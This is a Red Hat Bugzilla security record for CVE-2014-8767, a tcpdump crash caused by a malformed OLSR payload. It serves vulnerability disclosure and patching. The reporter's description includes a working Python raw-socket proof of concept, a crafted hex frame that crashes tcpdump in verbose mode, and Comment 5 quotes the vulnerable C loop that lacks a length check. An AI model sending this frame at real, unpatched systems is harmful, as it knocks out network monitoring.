Bug 1165160 (CVE-2014-8767) - CVE-2014-8767 tcpdump: denial of service in verbose mode using malformed OLSR payload
Summary: CVE-2014-8767 tcpdump: denial of service in verbose mode using malformed OLSR...
Keywords:
Status: CLOSED WONTFIX
Alias: CVE-2014-8767
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1165165
Blocks: 1165164
TreeView+ depends on / blocked
 
Reported: 2014-11-18 13:19 UTC by Vasyl Kaigorodov
Modified: 2021-06-14 15:04 UTC (History)
5 users (show)

Fixed In Version: tcpdump 4.7.0
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2021-06-14 15:04:01 UTC


Attachments (Terms of Use)
Fix_uncheck_length_olsr_patch_ from_debian_bug (558 bytes, patch)
2014-11-25 16:42 UTC, Siddharth Sharma
no flags Details | Diff

Description Vasyl Kaigorodov 2014-11-18 13:19:34 UTC
Tcpdump program crash was reported [1] when processing a malformed OLSR payload.
Tcpdump should be run with verbose output flag set to trigger this issue.

To reproduce start tcpdump on a network interface

   sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide the segfault message on certain environments, see dmesg for details)
and use the following python program to generate a frame on the network (might also need sudo):

   #!/usr/bin/env python
   from socket import socket, AF_PACKET, SOCK_RAW
   s = socket(AF_PACKET, SOCK_RAW)
   s.bind(("lo", 0))
   olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"
   s.send(olsr_frame)

Affected versions are 3.9.6 through 4.6.2

[1]: http://seclists.org/bugtraq/2014/Nov/90

Comment 1 Vasyl Kaigorodov 2014-11-18 13:31:00 UTC
Created tcpdump tracking bugs for this issue:

Affects: fedora-all [bug 1165165]

Comment 3 Siddharth Sharma 2014-11-25 16:42:24 UTC
Created attachment 961282 [details]
Fix_uncheck_length_olsr_patch_ from_debian_bug

Comment 4 Michal Sekletar 2014-11-25 17:34:44 UTC
Thanks for the patch but the bug is already fixed. I added this bug number to bugs= field when I created update but bodhi is updating only the tracking bug instead of this one. Same applies to other currently opened CVE bugs for tcpdump.

Comment 5 Siddharth Sharma 2014-11-25 18:10:45 UTC
Analysis
========

In function olsr_print_neighbor (const u_char *msg_data, u_int hello_len)
No length check is done for hello_len variable prior to printing msg_data
as while loop is used which iterates according to the size of hello_len,
having really large value of hello_len can cause crash
    
   while (hello_len >= sizeof(struct in_addr)) {

        /* print 4 neighbors per line */

        printf("%s%s", ipaddr_string(msg_data),
               neighbor % 4 == 0 ? "\n\t\t" : " ");

        msg_data += sizeof(struct in_addr);
        hello_len -= sizeof(struct in_addr);
    }

Comment 6 Fedora Update System 2014-11-27 08:33:47 UTC
tcpdump-4.5.1-2.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 8 Michal Sekletar 2014-11-27 12:43:23 UTC
Yes it is. Affected versions are 3.9.6 through 4.6.2

Comment 9 Fedora Update System 2014-12-04 06:25:52 UTC
tcpdump-4.4.0-4.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 10 Fedora Update System 2014-12-06 10:25:28 UTC
tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 12 Siddharth Sharma 2015-04-30 07:53:31 UTC
Statement:

Red Hat Product Security has rated this issue as having low security impact, a future update may address this flaw in tcpdump.

Comment 13 Product Security DevOps Team 2021-06-14 15:04:01 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2014-8767


Note You need to log in before you can comment on or make changes to this bug.